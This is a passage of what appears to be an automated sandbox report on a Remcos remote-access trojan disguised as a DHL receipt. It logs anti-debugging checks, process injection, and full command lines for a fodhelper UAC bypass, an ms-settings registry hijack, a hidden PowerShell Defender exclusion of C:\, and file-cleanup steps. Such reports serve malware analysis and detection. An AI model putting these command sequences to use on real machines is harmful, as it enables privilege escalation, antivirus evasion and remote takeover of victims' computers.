Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 7_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 7_2_00007FF7689D7B4C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 8_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 8_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 8_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 8_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 8_2_00007FF7689D7B4C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 11_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 11_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 11_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 11_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FF7689D7B4C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040AE51 FindFirstFileW,FindNextFileW, 20_2_0040AE51
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA47C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 0_2_2DA47C97
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00418981 memset,GetSystemInfo, 20_2_00418981
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.tmp Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\ Jump to behavior
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1767013718.000000002D4A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: remcos.exe, 00000005.00000003.2495195911.00000000005F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh[b%SystemRoot%\system32\mswsock.dllss~W
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.000000000073E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8|z%SystemRoot%\system32\mswsock.dll
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.000000000061E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000029.00000002.1940219819.000000000075D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1767013718.000000002D4A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e
Source: bhvC179.tmp.20.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: remcos.exe, 00000005.00000003.2495195911.000000000061E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000625000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWzf
Source: remcos.exe, 00000029.00000002.1940219819.0000000000718000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhvC179.tmp.20.dr Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe API call chain: ExitProcess graph end node
Source: C:\ProgramData\Remcos\remcos.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\xkn.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BD920 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_028BD920
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process queried: DebugFlags Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugFlags Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_2DA749F9
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF31A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle, 19_2_00007FF6DF31A29C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 20_2_0040DD85
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_028B7CC8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA832B5 mov eax, dword ptr fs:[00000030h] 0_2_2DA832B5
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028FF3AD mov eax, dword ptr fs:[00000030h] 0_2_028FF3AD
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC4AB4 mov eax, dword ptr fs:[00000030h] 5_2_45BC4AB4
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5E32B5 mov eax, dword ptr fs:[00000030h] 5_2_2D5E32B5
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA51CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 0_2_2DA51CFE
Source: C:\Users\Public\xkn.exe Process token adjusted: Debug
Source: C:\ProgramData\Remcos\remcos.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA74FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_2DA74FDC
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA7BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_2DA7BB22
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA74B47 SetUnhandledExceptionFilter, 0_2_2DA74B47
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter, 1_2_004098D0
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004098F0 SetUnhandledExceptionFilter, 1_2_004098F0
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_45BC60E2
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_45BC2B1C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_45BC2639
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_2D5D4FDC
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_2D5D49F9
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D49F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_2D5D49F8
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D4B47 SetUnhandledExceptionFilter, 5_2_2D5D4B47
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5DBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_2D5DBB22
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00007FF7689C8FA4
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C93B0 SetUnhandledExceptionFilter, 7_2_00007FF7689C93B0
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF7689C8FA4
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C93B0 SetUnhandledExceptionFilter, 8_2_00007FF7689C93B0
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00007FF7689C8FA4
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C93B0 SetUnhandledExceptionFilter, 11_2_00007FF7689C93B0
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF31ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FF6DF31ED50
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF31F050 SetUnhandledExceptionFilter, 19_2_00007FF6DF31F050
Source: C:\Users\Public\xkn.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Memory allocated: C:\Users\Public\Libraries\yfkwifxL.pif base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Memory allocated: C:\Users\Public\Libraries\yfkwifxL.pif base: 24020000 protect: page execute and read and write Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B80EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 5_2_2D5B80EF
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe Jump to dropped file
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section unmapped: C:\Users\Public\Libraries\yfkwifxL.pif base address: 400000 Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Memory written: C:\Users\Public\Libraries\yfkwifxL.pif base: 256008 Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 0_2_2DA520F7
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA59627 mouse_event, 0_2_2DA59627
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\Users\Public\Libraries\yfkwifxL.pif C:\Users\Public\Libraries\yfkwifxL.pif
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: C:\Users\Public\Libraries\yfkwifxL.pif Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg"
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle"
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr]
Source: remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.000000000069B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerK5\
Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managere=C:
Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager6
Source: remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.000000000069B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: remcos.exe, 00000005.00000003.1858721908.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.dr Binary or memory string: [Program Manager]
Source: remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managermcos\remcos.exe
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA74C52 cpuid 0_2_2DA74C52
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess, 0_2_028BDAA4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_028A5A78
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoA, 0_2_028AA7A8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoA, 0_2_028AA75C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_028A5B84
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess, 0_2_028BDAA4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess, 0_2_028C5E01
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_2DA91CD8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: EnumSystemLocalesW, 0_2_2DA91F9B
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: EnumSystemLocalesW, 0_2_2DA91F50
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoW, 0_2_2DA888ED
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoA, 0_2_2DA4F8D1
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoW, 0_2_2DA92543
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_2DA9243C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: EnumSystemLocalesW, 0_2_2DA88404
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_2DA92610
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_2DA920C3
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: EnumSystemLocalesW, 0_2_2DA92036
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoW, 0_2_2DA92313
